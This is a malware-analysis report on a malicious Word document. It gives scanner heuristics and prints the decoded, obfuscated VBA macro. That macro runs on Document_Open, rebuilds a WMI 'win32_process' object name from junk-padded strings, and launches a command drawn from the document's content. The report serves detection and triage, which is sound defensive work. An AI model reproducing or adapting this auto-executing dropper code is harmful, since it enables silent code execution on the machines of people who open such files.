MALICIOUS
Risk Score: 172
Heuristics: 7
- ClamAV: Doc.Malware.Valyria-10034158-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Malware.Valyria-10034158-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
  Document contains VBA macro code
- GetObject call [high] OLE_VBA_GETOBJ
  Matched line in script: Set N0jfgbdcexmfr = VBA.GetObject(Whsg9jxi_om)
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro [low] OLE_VBA_DOCOPEN
  Matched line in script: Private Sub Document_open()
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8473 bytes |

SHA-256: 2b8afd212b0a2ad26a917e5368163e3c32e5256aa102f773d94d8a58600b403d

Detection
ClamAV: No threats found
Obfuscation or payload: likely
92 of 154 identifiers look randomly generated (e.g. 'Prp0rgc35w3gkhpk3u'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.

Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ynzysnuyyfihfq23d"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_open()
Oxx2xwfkfk7ikbf9w
End Sub
Attribute VB_Name = "Pc1nzntniqj_dur51"
Attribute VB_Name = "Jlzk8qsqcshl6jk"
Function Oxx2xwfkfk7ikbf9w()
GoTo aRiqA
Const BjxaCGJ As String = "A"
Const xolsDFAoA As String = ","
Const Ikdha As String = "*high*,*critic*"
Dim ihJfBp As Range: Set ihJfBp = Array((BjxaCGJ), Target)
If ihJfBp Is Nothing Then
End If
Dim URsHL() As String: URsHL = Split(Ikdha, xolsDFAoA)
aRiqA:
skuwd = Z3neypc4_6hl3z + Ynzysnuyyfihfq23d _
. _
Content + Q955il2wdzr2d8fc1a
GoTo qckhE
Const szAVCX As String = "A"
Const ZDFvjGA As String = ","
Const wefyBED As String = "*high*,*critic*"
Dim YqzDYkkZ As Range: Set YqzDYkkZ = Array((szAVCX), Target)
If YqzDYkkZ Is Nothing Then
End If
Dim LPhmsCuzH() As String: LPhmsCuzH = Split(wefyBED, ZDFvjGA)
qckhE:
mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
T0lomy3trzjqt6zc = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
GoTo BcOIJEb
Const IzaGEVCD As String = "A"
Const frXBRIAUC As String = ","
Const liXWDHf As String = "*high*,*critic*"
Dim BBKJHBtF As Range: Set BBKJHBtF = Array((IzaGEVCD), Target)
If BBKJHBtF Is Nothing Then
End If
Dim vXKNhR() As String: vXKNhR = Split(liXWDHf, frXBRIAUC)
BcOIJEb:
T0_pq5at6a81jt230i = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
GoTo NjfVZEH
Const cujVJONG As String = "A"
Const zrdcAzBue As String = ","
Const FwnlEcJ As String = "*high*,*critic*"
Dim MemVBBC As Range: Set MemVBBC = Array((cujVJONG), Target)
If MemVBBC Is Nothing Then
End If
Dim XCCUFUDF() As String: XCCUFUDF = Split(FwnlEcJ, zrdcAzBue)
NjfVZEH:
T2kyo942hf2v = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
GoTo dDVvDFyJ
Const KTwdM As String = "A"
Const kOGmA As String = ","
Const bvWlGF As String = "*high*,*critic*"
Dim CivKlI As Range: Set CivKlI = Array((KTwdM), Target)
If CivKlI Is Nothing Then
End If
Dim BJuiHE() As String: BJuiHE = Split(bvWlGF, kOGmA)
dDVvDFyJ:
X8gbzx64bs3 = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
GoTo OMnbClgE
Const NABiUJmBA As String = "A"
Const TTSSDBE As String = ","
Const zWNhsCZ As String = "*high*,*critic*"
Dim hpBCIH As Range: Set hpBCIH = Array((NABiUJmBA), Target)
If hpBCIH Is Nothing Then
End If
Dim tkDRHFKIL() As String: tkDRHFKIL = Split(zWNhsCZ, TTSSDBE)
OMnbClgE:
Cr4f505hg7vldsf0c = T2kyo942hf2v + X8gbzx64bs3 + T0_pq5at6a81jt230i + mjbBYHhbs + T0lomy3trzjqt6zc
GoTo LIJNuGn
Const yoxbGFcFG As String = "A"
Const EBzng As String = ","
Const WnGZXISGD As String = "*high*,*critic*"
Dim TtymyqHC As Range: Set TtymyqHC = Array((yoxbGFcFG), Target)
If TtymyqHC Is Nothing Then
End If
Dim kzJQDGJE() As String: kzJQDGJE = Split(WnGZXISGD, EBzng)
LIJNuGn:
Whsg9jxi_om = Prp0rgc35w3gkhpk3u(Cr4f505hg7vldsf0c)
GoTo IfwvovBbI
Const nUCpSBGl As String = "A"
Const dGHeiB As String = ","
Const DfLwCIJs As String = "*high*,*critic*"
Dim wPwsfD As Range: Set wPwsfD = Array((nUCpSBGl), Target)
If wPwsfD Is Nothing Then
End If
Dim GwCvEyD() As String: GwCvEyD = Split(DfLwCIJs, dGHeiB)
IfwvovBbI:
Set N0jfgbdcexmfr = VBA.GetObject(Whsg9jxi_om)
GoTo mgbUQB
Const ODzQPrd As String = "A"
Const gHvzZ As String = ","
Const gzqiCG As String = "*high*,*critic*"
Dim kqPZDRGh As Range: Set kqPZDRGh = Array((ODzQPrd), Target)
If kqPZDRGh Is Nothing Then
End If
Dim eFJdCEIGJ() As String: eFJdCEIGJ = Split(gzqiCG, gHvzZ)
mgbUQB:
mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
pqwm = Prp0rgc35w3gkhpk3u(mxkikw)
GoTo SdmZKHA
Const JoWtI As String = "A"
Const RzBkG As String = ","
Const RoGdiLo As String = "*high*,*critic*"
Dim WTESfHHbE As Range: Set WTESfHHbE = Array((JoWtI), Target)
If WTESfHHbE Is Nothing Then
End If
Dim AsczD() As String: AsczD = Split(RoGdiLo, RzBkG)
SdmZKHA:
N0jfgbdcexmfr.Create pqwm, Nbpclsvfxustc, I85a5jzr195h
GoTo woXMHFAWj
Const tTYAKI As String = "A"
Const NPikOxWEE As String = ","
Const wGGXPWXvH As String = "*high*,*critic*"
Dim eBdxEG As Range: Set eBdxEG = Array((tTYAKI), Target)
If eBdxEG Is Nothing Then
End If
Dim GpgYnI() As String: GpgYnI = Split(wGGXPWXvH, NPikOxWEE)
woXMHFAWj:
End Function
Function Prp0rgc35w3gkhpk3u(Zdvjtoaydjbgx6nno)
On Error Resume Next
GoTo mQJJC
Const RCizEteb As String = "A"
Const fcMsqBqHS As String = ","
Const eiWFHgJI As String = "*high*,*critic*"
Dim HiXlCAMl As Range: Set HiXlCAMl = Array((RCizEteb), Target)
If HiXlCAMl Is Nothing Then
End If
Dim HKGPhf() As String: HKGPhf = Split(eiWFHgJI, fcMsqBqHS)
mQJJC:
S4z44a_rm07 = Zdvjtoaydjbgx6nno
GoTo qabazEA
Const TWtrFHKBF As String = "A"
Const UFSXB As String = ","
Const SwIwjFCGt As String = "*high*,*critic*"
Dim tfUFkPBI As Range: Set tfUFkPBI = Array((TWtrFHKBF), Target)
If tfUFkPBI Is Nothing Then
End If
Dim GwBkDZG() As String: GwBkDZG = Split(SwIwjFCGt, UFSXB)
qabazEA:
Zo3kx9wgfsdgp2v = Bsmpx01xdp1btsbzx(S4z44a_rm07)
GoTo IAZNKNFF
Const QhLjEC As String = "A"
Const TmaaI As String = ","
Const QTrqHnpVB As String = "*high*,*critic*"
Dim MFOcG As Range: Set MFOcG = Array((QhLjEC), Target)
If MFOcG Is Nothing Then
End If
Dim tllnMEB() As String: tllnMEB = Split(QTrqHnpVB, TmaaI)
IAZNKNFF:
Prp0rgc35w3gkhpk3u = Zo3kx9wgfsdgp2v
GoTo dxujxGCSH
Const GvzsBP As String = "A"
Const VkIrTt As String = ","
Const OhlNFI As String = "*high*,*critic*"
Dim wxhyXoc As Range: Set wxhyXoc = Array((GvzsBP), Target)
If wxhyXoc Is Nothing Then
End If
Dim JHxtqF() As String: JHxtqF = Split(OhlNFI, VkIrTt)
dxujxGCSH:
End Function
Function Bsmpx01xdp1btsbzx(Oe3lz2kgadv0)
GoTo tFQrUF
Const FQbNABABD As String = "A"
Const bhdApJCs As String = ","
Const wrBNJ As String = "*high*,*critic*"
Dim VCOQBBJME As Range: Set VCOQBBJME = Array((FQbNABABD), Target)
If VCOQBBJME Is Nothing Then
End If
Dim AndgBCK() As String: AndgBCK = Split(wrBNJ, bhdApJCs)
tFQrUF:
GoTo YeFGHHg
Const YoONRCDR As String = "A"
Const NRCfdB As String = ","
Const BkXdJC As String = "*high*,*critic*"
Dim xhvKHu As Range: Set xhvKHu = Array((YoONRCDR), Target)
If xhvKHu Is Nothing Then
End If
Dim zaPgDlYE() As String: zaPgDlYE = Split(BkXdJC, NRCfdB)
YeFGHHg:
GoTo VGJvOIo
Const IcMvJH As String = "A"
Const nMrFDxBZ As String = ","
Const DOTbEvAC As String = "*high*,*critic*"
Dim DWDXCYzB As Range: Set DWDXCYzB = Array((IcMvJH), Target)
If DWDXCYzB Is Nothing Then
End If
Dim gFPNA() As String: gFPNA = Split(DOTbEvAC, nMrFDxBZ)
VGJvOIo:
Bsmpx01xdp1btsbzx = Replace(Oe3lz2kgadv0, "ns w" + "u db nd", Kef0mya01bb)
GoTo HJbpE
Const jvKCCCN As String = "A"
Const mpLEDLwAI As String = ","
Const ymBRCJA As String = "*high*,*critic*"
Dim lJxIKkhCA As Range: Set lJxIKkhCA = Array((jvKCCCN), Target)
If lJxIKkhCA Is Nothing Then
End If
Dim UNxmoIDW() As String: UNxmoIDW = Split(ymBRCJA, mpLEDLwAI)
HJbpE:
GoTo AEmiPt
Const nXOBD As String = "A"
Const PCZMFnb As String = ","
Const aspdJ As String = "*high*,*critic*"
Dim kYSmGCjDH As Range: Set kYSmGCjDH = Array((nXOBD), Target)
If kYSmGCjDH Is Nothing Then
End If
Dim xqRcJHJC() As String: xqRcJHJC = Split(aspdJ, PCZMFnb)
AEmiPt:
GoTo uPBZMu
Const RPnSaCJu As String = "A"
Const UdmGIddWE As String = ","
Const kvSXRJ As String = "*high*,*critic*"
Dim UByHC As Range: Set UByHC = Array((RPnSaCJu), Target)
If UByHC Is Nothing Then
End If
Dim LIhSwfESI() As String: LIhSwfESI = Split(kvSXRJ, UdmGIddWE)
uPBZMu:
End Function